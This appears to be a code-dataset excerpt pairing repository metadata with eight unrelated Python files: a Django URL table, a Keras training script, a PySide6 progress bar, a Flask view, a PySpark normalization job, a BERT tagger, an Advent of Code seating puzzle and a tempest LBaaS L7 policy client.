| 24.844 | 88 | 0.551924 | 1,045 | 6,211 | 3.186603 | 0.116746 | 0.054655 | 0.031532 | 0.045045 | 0.578078 | 0.478679 | 0.404805 | 0.348048 | 0.241742 | 0.18979 | 0 | 0.062683 | 0.285944 | 6,211 | 249 | 89 | 24.943775 | 0.688162 | 0.085976 | 0 | 0.301887 | 0 | 0 | 0.005659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.037736 | 0 | 0.157233 | 0.018868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d48337c78ce2e640508a61a6350b194e4ad2ee | 507 | py | Python | backend/product/urls.py | kmrul/Grocery-Store | a8abc99d66daf7c1dbf42a5bb9b563bda98b9e3c | [
"MIT"
] | null | null | null | backend/product/urls.py | kmrul/Grocery-Store | a8abc99d66daf7c1dbf42a5bb9b563bda98b9e3c | [
"MIT"
] | null | null | null | backend/product/urls.py | kmrul/Grocery-Store | a8abc99d66daf7c1dbf42a5bb9b563bda98b9e3c | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
# Route table for the product API: overview, list, detail and CRUD views.
# NOTE(review): 'product/create' lacks the trailing slash its siblings
# use — confirm this is intentional before normalising.
urlpatterns = [
    path('product/', views.apiOverview, name='overview'),
    path('product/list/', views.productList, name='product-list'),
    path('product/detail/<str:pk>', views.productDetail, name='product-detail'),
    path('product/create', views.productCreate, name='product-create'),
    path('product/update/<str:pk>', views.productUpdate, name='product-update'),
    path('product/delete/<str:pk>', views.productDelete, name='product-delete'),
]
44d4c378e92d06b8248254af3ada493cd9a99613 | 1,512 | py | Python | Train.py | jinsuyun/DriavablaMap_Segmentation | 8537f19f007f064ca2ab3a91bd25c714ecb50a48 | [
"BSD-3-Clause"
] | null | null | null | Train.py | jinsuyun/DriavablaMap_Segmentation | 8537f19f007f064ca2ab3a91bd25c714ecb50a48 | [
"BSD-3-Clause"
] | null | null | null | Train.py | jinsuyun/DriavablaMap_Segmentation | 8537f19f007f064ca2ab3a91bd25c714ecb50a48 | [
"BSD-3-Clause"
] | null | null | null | from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard
import tensorflow as tf
import Data
import Model
# import myslack
import os
import argparse
from tensorflow.python.client import device_lib
import warnings
warnings.filterwarnings("ignore")

# CLI: pick the visible GPU(s) before TensorFlow initialises.
# NOTE(review): the description string says 'PyTorch Training' although
# this script uses TensorFlow/Keras — looks like a copy-paste leftover.
parser = argparse.ArgumentParser(description='PyTorch Training')
parser.add_argument('--gpus', default='3', type=str, help='Which GPUs you want to use? (0,1,2,3)')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
# myslack.send_slack("start")
# path = 'D:/Models/'
# Directory where epoch checkpoints are written.
path = 'Models/gpu2/'
# path = 'Models/'
#gpus = tf.config.experimental.list_logical_devices('GPUS')
#if gpus:
#    tf.config.experimental.set_memory_growth(gpus[0], True)
def scheduler(epoch):
    """Piecewise learning-rate schedule for LearningRateScheduler.

    epochs 0-2  -> 1e-5 (warm-up)
    epoch  3    -> mean of warm-up and base rate
    epochs 4-14 -> 1e-4 (base rate)
    epoch 15+   -> 5e-5 (decayed rate)
    """
    warmup_epochs = 3
    warmup_rate = 1e-5  # 0.00001
    decay_epoch = 15
    base_rate = 1e-4  # 0.0001
    decayed_rate = 5e-5  # 0.00005
    if epoch < warmup_epochs:
        return warmup_rate
    if epoch == warmup_epochs:
        return (base_rate + warmup_rate) / 2
    if epoch < decay_epoch:
        return base_rate
    return decayed_rate
# Save a checkpoint per epoch (filename embeds the IoU metrics) and apply
# the piecewise learning-rate schedule above.
callback = [
    ModelCheckpoint(path + 'model_{epoch:02d}-{val_iou_acc:.4f}_{iou_acc:.4f}.h5'),
    LearningRateScheduler(scheduler, verbose=1),
    # TensorBoard('./logs/', profile_batch=2)
]
#with tf.device('/XLA_GPU:0'):
b = 4  # batch size for both train and test loaders
tr_batch = Data.Load_tr(batch_size=b)
te_batch = Data.Load_te(batch_size=b)
print(tr_batch)
c = 3  # NOTE(review): unused — SegModel is called with the literal 3 below
model = Model.SegModel(3)
model.load()
model.fit(tr_batch, te_batch, callback)
# myslack.send_slack("finish")
| 25.627119 | 98 | 0.703042 | 215 | 1,512 | 4.804651 | 0.497674 | 0.027106 | 0.030978 | 0.046467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037125 | 0.162698 | 1,512 | 58 | 99 | 26.068966 | 0.778831 | 0.214286 | 0 | 0 | 0 | 0 | 0.127768 | 0.044293 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0.2 | 0 | 0.325 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d52e44864bf1ce0a5095905d078b5ae85da8b7 | 3,470 | py | Python | ui/custom_pb/custompb.py | magnusjwatson2786/Container-GUI | 42cbe1bb970fbabe5b5fde873425f262e9207d30 | [
"MIT"
] | null | null | null | ui/custom_pb/custompb.py | magnusjwatson2786/Container-GUI | 42cbe1bb970fbabe5b5fde873425f262e9207d30 | [
"MIT"
] | null | null | null | ui/custom_pb/custompb.py | magnusjwatson2786/Container-GUI | 42cbe1bb970fbabe5b5fde873425f262e9207d30 | [
"MIT"
] | null | null | null | from PySide6.QtCore import *
from PySide6.QtGui import *
from PySide6.QtWidgets import *
class CustomPb(QWidget):
    """Horizontal progress bar drawn entirely in paintEvent.

    Renders a background track near the bottom of the widget, a filled
    portion proportional to ``value / max_value`` and, optionally, a
    centred "value + suffix" label.
    """
    def __init__(
        self,
        value = 0,
        progress_width = 2,
        # progress_length= 500,
        is_rounded = False,
        max_value = 100,
        progress_color = "#ff79c6",
        enable_text = True,
        font_family = "Segoe UI",
        font_size = 12,
        suffix = "%",
        text_color = "#ff79c6",
        enable_bg = True,
        bg_color = "#44475a"
    ):
        QWidget.__init__(self)

        # CUSTOM PROPERTIES
        self.value = value  # current progress value
        self.progress_width = progress_width  # bar thickness in pixels
        # self.progress_length = progress_length
        self.progress_rounded_cap = is_rounded  # round vs mitre pen joins
        self.max_value = max_value  # value that maps to a full-width bar
        self.progress_color = progress_color

        # Text
        self.enable_text = enable_text
        # NOTE(review): font_family/font_size are set on the painter but then
        # overridden by a hard-coded 12pt QFont before drawing — confirm.
        self.font_family = font_family
        self.font_size = font_size
        self.suffix = suffix  # appended after the value, e.g. "%"
        self.text_color = text_color

        # BG
        self.enable_bg = enable_bg  # whether to draw the background track
        self.bg_color = bg_color

    # ADD DROPSHADOW
    def add_shadow(self, enable):
        """Attach a soft drop shadow to the widget when ``enable`` is truthy."""
        if enable:
            self.shadow = QGraphicsDropShadowEffect(self)
            self.shadow.setBlurRadius(15)
            self.shadow.setXOffset(0)
            self.shadow.setYOffset(0)
            self.shadow.setColor(QColor(0, 0, 0, 80))
            self.setGraphicsEffect(self.shadow)

    # SET VALUE
    def setValue(self, value):
        """Update the progress value and repaint immediately."""
        self.value = value
        self.repaint() # Render progress bar after change value

    # PAINT EVENT (draws the bar and the optional text label)
    def paintEvent(self, e):
        # SET PROGRESS PARAMETERS
        width = self.width() - self.progress_width
        height = self.height() - self.progress_width
        margin = self.progress_width / 2
        # The track sits three quarters of the way down the widget.
        y=0.75*self.height()+margin
        # Pixel length of the filled portion.
        value = (self.value / self.max_value) * width
        # length = self.progress_length

        # PAINTER
        paint = QPainter()
        paint.begin(self)
        paint.setRenderHint(QPainter.Antialiasing) # remove pixelated edges
        paint.setFont(QFont(self.font_family, self.font_size))

        # CREATE RECTANGLE for the text value (centred middle half).
        # rect = QRect(0, 0, self.width(), self.height())
        # NOTE(review): these '/' divisions yield floats — confirm PySide6's
        # QRect/drawRect accept them on the targeted Qt version.
        rect = QRect(self.width()/4, self.height()/4, self.width()/2, self.height()/2)
        paint.setPen(Qt.NoPen)

        # PEN
        pen = QPen()
        pen.setWidth(self.progress_width)
        # Set Round Cap
        if self.progress_rounded_cap:
            pen.setJoinStyle(Qt.RoundJoin)
        else:
            pen.setJoinStyle(Qt.MiterJoin)

        # ENABLE BG: draw the full-width background track first.
        if self.enable_bg:
            pen.setColor(QColor(self.bg_color))
            paint.setPen(pen)
            paint.drawRect(margin, y ,width ,self.progress_width )

        # Draw the filled portion of the bar over the track.
        pen.setColor(QColor(self.progress_color))
        paint.setPen(pen)
        paint.drawRect(margin, y ,value ,self.progress_width )

        # CREATE TEXT (value + suffix, centred)
        if self.enable_text:
            pen.setColor(QColor(self.text_color))
            pen.setWidth(40)
            font = QFont()
            # print(font.pointSize())
            font.setPointSize(12)
            paint.setFont(font)
            paint.setPen(pen)
            paint.drawText(rect, Qt.AlignCenter, f"{self.value}{self.suffix}")

        # END
        paint.end()
44d52f169921ab9efb57ff8c6c57b8de676e6dfb | 1,301 | py | Python | camhudson/views/index.py | Hudson00/Hudson00.github.io | 75fede08521dc1e10cb2ce29e20c54c93e9e6db6 | [
"MIT"
] | null | null | null | camhudson/views/index.py | Hudson00/Hudson00.github.io | 75fede08521dc1e10cb2ce29e20c54c93e9e6db6 | [
"MIT"
] | null | null | null | camhudson/views/index.py | Hudson00/Hudson00.github.io | 75fede08521dc1e10cb2ce29e20c54c93e9e6db6 | [
"MIT"
] | null | null | null | """Cam Hudson Personal Website app's index.html view.
URLs handled in this file include:
/
"""
from flask import render_template, session
from camhudson.views.utility import create_index_card # Make linter shut up
import camhudson
@camhudson.app.route('/', methods=['GET'])
@camhudson.app.route('/index.html', methods=['GET'])
def get_index() -> str:
    """Render the homepage with its three navigation cards."""
    # (title, description, link, image path, image alt text) per card.
    card_specs = [
        (
            'Bio',
            'Take a few moments to learn a little about Cam!',
            '/bio',
            '/static/images/cam.png',
            'Cam Hudson selfie',
        ),
        (
            'Résumé',
            "Dive into Cam's skills, education, and work history!",
            '/hudson-resume.pdf" target="_blank',
            '/static/images/joao-ferrao-resume.png',
            'Resume on desk',
        ),
        (
            'Contact',
            'Find out how you can get in touch with Cam!',
            'contact-info',
            '/static/images/elizaveta-kushnirenko-mailbox.png',
            'Mailbox',
        ),
    ]
    cards = [create_index_card(*spec) for spec in card_specs]
    return render_template('index.html', cards=cards)
| 32.525 | 76 | 0.530361 | 138 | 1,301 | 4.913043 | 0.615942 | 0.064897 | 0.088496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.346656 | 1,301 | 39 | 77 | 33.358974 | 0.797647 | 0.106072 | 0 | 0.15625 | 0 | 0 | 0.316247 | 0.092963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.09375 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d5d7d712b3b2f871108b46b0de197890de0365 | 2,661 | py | Python | ai_services/anomaly_detection/data_preprocessing_examples/oci_data_flow_based_examples/example_code/normalization.py | oracle-samples/oci-data-science-ai-samples | 3128787c1347a17f9dc2194f1a16a500ed08eb8e | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | ai_services/anomaly_detection/data_preprocessing_examples/oci_data_flow_based_examples/example_code/normalization.py | oracle-samples/oci-data-science-ai-samples | 3128787c1347a17f9dc2194f1a16a500ed08eb8e | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | ai_services/anomaly_detection/data_preprocessing_examples/oci_data_flow_based_examples/example_code/normalization.py | oracle-samples/oci-data-science-ai-samples | 3128787c1347a17f9dc2194f1a16a500ed08eb8e | [
"UPL-1.0",
"Apache-2.0"
] | 2 | 2022-03-28T07:27:28.000Z | 2022-03-28T21:18:36.000Z | from pyspark.sql import SparkSession
from pyspark.sql import functions as F
import argparse
from pyspark.ml.feature import MinMaxScaler, StandardScaler, VectorAssembler
def extract(row):
    """Flatten a Row holding a scaled feature vector into a plain tuple.

    Drops the trailing element of ``scaledFeatures`` (the scaled copy of the
    appended ``id`` column) and prefixes the raw row id, yielding
    ``(id, f1, f2, ...)``.
    """
    features = row.scaledFeatures.toArray().tolist()
    return tuple([row.id] + features[:-1])
def normalize_data(df, scaler_type, columns):
    """Scale numeric features using one of two methods:

    1) min-max normalization ("minmax"), or
    2) standardization ("standard").

    Args:
        df: input Spark DataFrame.
        scaler_type: either "minmax" or "standard".
        columns: columns to be scaled/normalized; if falsy, every column
            except "id" and "timestamp" is scaled.

    Returns:
        DataFrame with the selected columns scaled and all remaining
        columns passed through unchanged.

    Raises:
        ValueError: if scaler_type is neither "minmax" nor "standard".
    """
    if not columns:
        columns = [col for col in df.columns if col not in {"id", "timestamp"}]
    # BUGFIX: derive the pass-through columns in the DataFrame's own order.
    # The previous list(set(...).difference(...)) produced a nondeterministic
    # column order in the joined result (and thus in any CSV written from it).
    scaled_set = set(columns)
    not_normalized_columns = [c for c in df.columns if c not in scaled_set]
    # Synthetic monotonically-increasing row id used to re-join the scaled
    # and unscaled halves afterwards.
    df = df.withColumn("id", F.monotonically_increasing_id())
    # BUGFIX: build new lists instead of `+=`, which mutated the caller's
    # `columns` list in place.
    columns = columns + ["id"]
    not_normalized_columns = not_normalized_columns + ["id"]
    assembler = VectorAssembler().setInputCols(
        columns).setOutputCol("features")
    transformed = assembler.transform(df.select(columns))
    if scaler_type == "minmax":
        scaler = MinMaxScaler(inputCol="features", outputCol="scaledFeatures")
    elif scaler_type == "standard":
        scaler = StandardScaler(
            inputCol="features",
            outputCol="scaledFeatures")
    else:
        raise ValueError("Invalid scaler type")
    scaler_model = scaler.fit(transformed.select("features"))
    scaled_data = scaler_model.transform(transformed)
    # `extract` drops the scaled copy of "id" and restores the raw id, so the
    # scaled frame's schema is ["id"] + the original scaled column names.
    scaled_data = (
        scaled_data.select(["id", "scaledFeatures"])
        .rdd.map(extract)
        .toDF(["id"] + columns[:-1])
    )
    return df.select(not_normalized_columns).join(
        scaled_data,
        on="id").drop("id")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input", required=True)
parser.add_argument("--output", required=True)
parser.add_argument("--norm", required=True)
parser.add_argument("--columns", nargs="+", required=True)
parser.add_argument("--coalesce", required=False, action="store_true")
args = parser.parse_args()
columns = args.columns[0].split(
" ") if len(args.columns) == 1 else args.columns
spark = SparkSession.builder.appName("DataFlow").getOrCreate()
input_data = spark.read.csv(
args.input,
sep=",",
inferSchema=True,
header=True)
input_data_scaled = normalize_data(input_data, args.norm, columns)
if args.coalesce:
input_data_scaled.coalesce(1).write.csv(args.output, header=True)
else:
input_data_scaled.write.csv(args.output, header=True)
| 33.2625 | 78 | 0.658023 | 295 | 2,661 | 5.810169 | 0.386441 | 0.029172 | 0.049592 | 0.049008 | 0.10035 | 0.032672 | 0 | 0 | 0 | 0 | 0 | 0.003349 | 0.214581 | 2,661 | 79 | 79 | 33.683544 | 0.816746 | 0.092822 | 0 | 0.034483 | 0 | 0 | 0.084954 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.068966 | 0.017241 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d71f0a51d5a31acbe4cd401e05ee26f9010239 | 3,051 | py | Python | deep_morphology/models/bert_tagger.py | juditacs/deep-morphology | 090c17e604499a3430ea835a6340fa3abdc6ea83 | [
"MIT"
] | 3 | 2019-10-16T12:25:37.000Z | 2021-01-16T00:31:37.000Z | deep_morphology/models/bert_tagger.py | juditacs/deep-morphology | 090c17e604499a3430ea835a6340fa3abdc6ea83 | [
"MIT"
] | 15 | 2018-09-12T20:26:44.000Z | 2018-11-09T20:10:37.000Z | deep_morphology/models/bert_tagger.py | juditacs/deep-morphology | 090c17e604499a3430ea835a6340fa3abdc6ea83 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 Judit Acs <judit@sch.bme.hu>
#
# Distributed under terms of the MIT license.
import torch
import torch.nn as nn
from pytorch_pretrained_bert import BertModel
from deep_morphology.models.base import BaseModel
from deep_morphology.models.seq2seq import compute_sequence_loss
from deep_morphology.models.mlp import MLP
# Resolved once at import time; all tensors are moved through to_cuda().
use_cuda = torch.cuda.is_available()


def to_cuda(var):
    """Move *var* to the GPU when CUDA is available; otherwise return it unchanged."""
    return var.cuda() if use_cuda else var
class BERTTagger(BaseModel):
    """POS tagger on top of a frozen pretrained BERT encoder.

    The BERT weights are frozen; only the optional LSTM, the optional
    layer-mixing weights and the MLP output projection are trained.
    """

    def __init__(self, config, dataset):
        super().__init__(config)
        self.dataset = dataset
        self.output_size = len(dataset.vocabs.pos)
        model_name = getattr(self.config, 'bert_model', 'bert-base-multilingual-cased')
        self.bert = BertModel.from_pretrained(model_name)
        # Which encoder output to tag from: a layer index, 'mean', or
        # 'weighted_sum' (learned per-layer mixing weights).
        self.bert_layer = self.config.bert_layer
        bert_size = 768 if 'base' in model_name else 1024
        n_layer = 12 if 'base' in model_name else 24
        if self.bert_layer == 'weighted_sum':
            # One learnable scalar weight per encoder layer.  (The original
            # code created this Parameter twice under the same condition;
            # once suffices.)
            self.bert_weights = nn.Parameter(torch.ones(n_layer, dtype=torch.float))
        if hasattr(self.config, 'lstm_size'):
            self.lstm = nn.LSTM(
                bert_size, self.config.lstm_size, batch_first=True,
                dropout=self.config.dropout,
                num_layers=self.config.lstm_num_layers,
                bidirectional=True)
            hidden_size = self.config.lstm_size * 2
        else:
            self.lstm = None
            hidden_size = bert_size
        # BUGFIX: the projection consumes whatever feeds it in forward() —
        # the bidirectional LSTM output (2 * lstm_size) when an LSTM is
        # configured, else the raw BERT size.  Using `bert_size` here broke
        # the LSTM path.  A dead nn.Linear assignment that was immediately
        # overwritten by this MLP has also been removed.
        self.output_proj = MLP(
            input_size=hidden_size,
            layers=self.config.mlp_layers,
            nonlinearity=self.config.mlp_nonlinearity,
            output_size=self.output_size,
        )
        # ignore <pad> = 3
        self.criterion = nn.CrossEntropyLoss(
            ignore_index=self.dataset.vocabs.pos['<pad>'])
        # Freeze the encoder: only downstream modules receive gradients.
        for param in self.bert.parameters():
            param.requires_grad = False

    def compute_loss(self, batch, output):
        """Cross-entropy over the POS tag sequence; padding positions are ignored."""
        target = to_cuda(torch.LongTensor(batch.pos))
        return compute_sequence_loss(target, output, self.criterion)

    def forward(self, batch):
        """Return per-token tag logits for a padded batch of sentences."""
        X = to_cuda(torch.LongTensor(batch.sentence))
        # Attention mask: 1 for real tokens, 0 for padding positions.
        mask = torch.arange(X.size(1)) < torch.LongTensor(batch.sentence_len).unsqueeze(1)
        mask = to_cuda(mask.long())
        bert_out, _ = self.bert(X, attention_mask=mask)
        if self.bert_layer == 'mean':
            bert_out = torch.stack(bert_out).mean(0)
        elif self.bert_layer == 'weighted_sum':
            bert_out = (
                self.bert_weights[:, None, None, None] * torch.stack(bert_out)).sum(0)
        else:
            bert_out = bert_out[self.bert_layer]
        if self.lstm:
            bert_out = self.lstm(bert_out)[0]
        return self.output_proj(bert_out)
| 36.321429 | 90 | 0.640118 | 402 | 3,051 | 4.646766 | 0.318408 | 0.051392 | 0.041756 | 0.038544 | 0.174518 | 0.110278 | 0.087794 | 0.087794 | 0.087794 | 0.087794 | 0 | 0.010979 | 0.253687 | 3,051 | 83 | 91 | 36.759036 | 0.808959 | 0.054081 | 0 | 0.09375 | 0 | 0 | 0.034746 | 0.009729 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.09375 | 0 | 0.234375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d7838cf86895dbb3bc71349d1a986ae126e5e6 | 4,246 | py | Python | python3/11.py | mn113/adventofcode2020 | 87e3062948444627eb95e1b81e8d1b6db9640ba0 | [
"MIT"
] | null | null | null | python3/11.py | mn113/adventofcode2020 | 87e3062948444627eb95e1b81e8d1b6db9640ba0 | [
"MIT"
] | null | null | null | python3/11.py | mn113/adventofcode2020 | 87e3062948444627eb95e1b81e8d1b6db9640ba0 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
part = 1
def read_input():
with open('../inputs/input11.txt') as fp:
lines = fp.readlines()
return [line.strip() for line in lines]
class Seat:
def __init__(self, x, y, state):
self.x = x
self.y = y
self.state = state
def __str__(self):
return self.state
def isEdge(self):
return self.state in '_|'
def isFloor(self):
return self.state == '.'
def isEmptySeat(self):
return self.state == 'L'
def isFilledSeat(self):
return self.state == '#'
# @returns Seat[]
def neighbours(self):
global seating
neighbs = {
'W': seating[self.y][self.x - 1],
'E': seating[self.y][self.x + 1],
'S': seating[self.y + 1][self.x],
'N': seating[self.y - 1][self.x],
'NW': seating[self.y - 1][self.x - 1],
'SW': seating[self.y + 1][self.x - 1],
'NE': seating[self.y - 1][self.x + 1],
'SE': seating[self.y + 1][self.x + 1]
}
return list(neighbs.values())
# @returns Seat[]
def line_of_sight_seats(self):
dirs = {
'N': (-1,0),
'NE': (-1,1),
'E': (0,1),
'SE': (1,1),
'S': (1,0),
'SW': (1,-1),
'W': (0,-1),
'NW': (-1,-1)
}
# look for first filled, empty or edge seat in a direction
def look_at_seat(direction):
pos = (self.y, self.x)
# do not take more than d steps from original pos
while 1:
pos = (pos[0] + direction[0], pos[1] + direction[1])
seat = seating[pos[0]][pos[1]]
if not seat.isFloor():
return seat
return [look_at_seat(direction) for direction in list(dirs.values())]
def get_new_state(self):
# skip floors and edges
if self.isEdge() or self.isFloor():
return self.state
if part == 1:
tolerance = 4
filled_neighbours = [nb for nb in self.neighbours() if nb.isFilledSeat()]
else:
tolerance = 5
filled_neighbours = [nb for nb in self.line_of_sight_seats() if nb.isFilledSeat()]
# node empty and no filled neighbs -> filled
if self.isEmptySeat() and len(filled_neighbours) == 0:
return '#'
# node filled and 4+ filled neighbs -> empty
elif self.isFilledSeat() and len(filled_neighbours) >= tolerance:
return 'L'
return self.state
# generate string snapshot of current seating area, for state comparison
# @returns {String}
def hash_seating(seating):
return "".join(["".join([str(seat) for seat in row]) for row in seating])
# pad grid with | and _ to avoid out-of-bounds errors:
# @param {string[]} grid
def pad_grid(grid):
pgrid = []
# sides
for y in range(len(grid)):
pgrid += ["|" + grid[y] + "|"]
# top, bottom
horiz = "_" * len(pgrid[0])
return [horiz] + pgrid + [horiz]
diagram = pad_grid(read_input())
# set up two 2D arrays, for current and next state
seating = []
next_seating = []
# fill initial seating
for y, line in enumerate(diagram):
seating += [[]]
for x, char in enumerate(line):
seating[y] += [Seat(x, y, char)]
# one iteration of time
def run_step(i):
global seating, next_seating
# new empty seating before filling from current
next_seating = []
# fill next_seating
for y, row in enumerate(seating):
next_seating += [[]]
for x, seat in enumerate(row):
next_seating[y] += [Seat(seat.x, seat.y, seat.get_new_state())]
# run time and keep comparing hashes to detect stable state
i = 0
while 1:
i += 1
run_step(i)
# progress...
if i % 20 == 0:
print(i, hash_seating(next_seating))
if hash_seating(seating) == hash_seating(next_seating):
# part 1 - number of full seats, once stable - 2183
# part 2 - same - 1990
print(hash_seating(seating).count("#"), "full seats")
break
else:
# shift seating states before next loop
seating, next_seating = next_seating, []
| 27.217949 | 94 | 0.542393 | 560 | 4,246 | 4.023214 | 0.275 | 0.024412 | 0.04261 | 0.034621 | 0.110963 | 0.091434 | 0.059476 | 0 | 0 | 0 | 0 | 0.02152 | 0.321479 | 4,246 | 155 | 95 | 27.393548 | 0.7605 | 0.18488 | 0 | 0.090909 | 0 | 0 | 0.019203 | 0.00611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141414 | false | 0 | 0 | 0.060606 | 0.30303 | 0.020202 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d7bf8fa8ad6da40c52b2f23d769cd6c11b59ae | 2,667 | py | Python | f5lbaasdriver/test/tempest/services/clients/l7policy_client.py | fsckss/f5-openstack-lbaasv2-driver | 678724d5b1eadad89a774af6d5e073512ba4998c | [
"Apache-2.0"
] | null | null | null | f5lbaasdriver/test/tempest/services/clients/l7policy_client.py | fsckss/f5-openstack-lbaasv2-driver | 678724d5b1eadad89a774af6d5e073512ba4998c | [
"Apache-2.0"
] | null | null | null | f5lbaasdriver/test/tempest/services/clients/l7policy_client.py | fsckss/f5-openstack-lbaasv2-driver | 678724d5b1eadad89a774af6d5e073512ba4998c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
u"""F5 Networks® LBaaSv2 L7 rules client for tempest tests."""
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_serialization import jsonutils
from six.moves.urllib import parse
from tempest.lib.common import rest_client
class L7PolicyClientJSON(rest_client.RestClient):
    """Tests L7 Policies API."""

    def list_l7policies(self, params=None):
        """List all L7 policies."""
        url = 'v2.0/lbaas/l7policies.json'
        if params:
            url = '?'.join([url, parse.urlencode(params)])
        resp, raw = self.get(url)
        decoded = jsonutils.loads(raw)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBodyList(resp, decoded['l7policies'])

    def get_l7policy(self, policy_id, params=None):
        """Get L7 policy."""
        url = 'v2.0/lbaas/l7policies/{0}'.format(policy_id)
        if params:
            url = '?'.join([url, parse.urlencode(params)])
        resp, raw = self.get(url)
        decoded = jsonutils.loads(raw)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBody(resp, decoded['l7policy'])

    def create_l7policy(self, **kwargs):
        """Create L7 policy."""
        payload = jsonutils.dumps({'l7policy': kwargs})
        resp, raw = self.post('v2.0/lbaas/l7policies.json', payload)
        decoded = jsonutils.loads(raw)
        # 201 Created is the expected status for a successful POST.
        self.expected_success(201, resp.status)
        return rest_client.ResponseBody(resp, decoded['l7policy'])

    def update_l7policy(self, policy_id, **kwargs):
        """Update L7 policy."""
        payload = jsonutils.dumps({'l7policy': kwargs})
        resp, raw = self.put(
            'v2.0/lbaas/l7policies/{0}'.format(policy_id), payload)
        decoded = jsonutils.loads(raw)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBody(resp, decoded['l7policy'])

    def delete_l7policy(self, policy_id):
        """Delete L7 policy."""
        resp, _ = self.delete(
            'v2.0/lbaas/l7policies/{0}'.format(policy_id))
        # 204 No Content; DELETE returns no body to parse.
        self.expected_success(204, resp.status)
| 39.220588 | 76 | 0.662542 | 354 | 2,667 | 4.918079 | 0.367232 | 0.041356 | 0.017231 | 0.031591 | 0.445721 | 0.445721 | 0.429064 | 0.412407 | 0.333716 | 0.333716 | 0 | 0.032474 | 0.214848 | 2,667 | 67 | 77 | 39.80597 | 0.798472 | 0.27934 | 0 | 0.487179 | 0 | 0 | 0.101975 | 0.067806 | 0 | 0 | 0 | 0 | 0 | 1 | 0.128205 | false | 0 | 0.076923 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |